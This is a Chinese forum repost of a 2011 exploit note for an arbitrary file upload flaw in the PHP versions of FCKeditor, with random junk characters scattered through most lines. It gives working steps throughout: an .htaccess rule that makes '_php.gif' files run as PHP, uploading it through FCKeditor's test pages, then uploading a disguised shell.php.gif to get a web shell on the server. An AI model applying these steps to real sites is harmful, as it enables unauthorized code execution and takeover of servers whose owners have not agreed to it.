FCKeditor所有php版本Upload上传漏洞: Y5 g6 O; Y) z' T5 p F
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! I5 ^; \& S& \' U7 p减小字体 增大字体3 c+ P& T6 J* o* ?* m
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability N m( O# Q* V# P& ^' f
[+] Date: 2011
7 x, C2 X3 B. H& o* s& b( S/ F[+] Author : sinesafe.cn1 w3 x' f% S: K; c0 z3 @1 v
[+] Website : WwW.sinesafe.cn% s' ?/ j/ p4 L5 J* Y, p
———————————————————$ U7 t& e1 a( M
1.create a htaccess file:0 T9 d% {/ L# z( m
code:( N7 ^. O1 L6 O" I9 _$ ~
<FilesMatch “_php.gif”>; g# l9 a1 w6 W7 v% [
SetHandler application/x-httpd-php5 F9 I2 [1 [+ W! T8 V7 V
</FilesMatch># n ~- P. r+ ]6 x J
|) ? G6 {+ F( f6 z2.Now upload this htaccess with FCKeditor.
2 T+ G: C# s: t M. ]8 L8 S) D5 ?: k) y+ q' y* }, M
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
5 ?' S- @3 U; h' _' D. [0 D# z& R' M& h/ W, z. o# d+ B% i
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
1 ^# s/ i0 O- u; X
8 K- k1 t, N: ?" e# l' ? i———————————————————————————————-$ H e- [/ j p* {7 y( V
3.Now upload shell.php.gif with FCKeditor.
3 Q" X6 j* ]1 g7 u. D4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
8 V! A& [6 n4 m% w9 S' @1 t5.http://www.sinesafe.cn/anything/shell_php.gif
% y; E' F. D$ S; e! k1 a0 p6.Now shell is available from server. |
, n( O, d# ?5 V3 c# }/ L
4 m- ~& E$ L& D
9 V: ]* X* z% N( E+ Y |
发表于 2013-10-27 17:25:21
收藏
支持
反对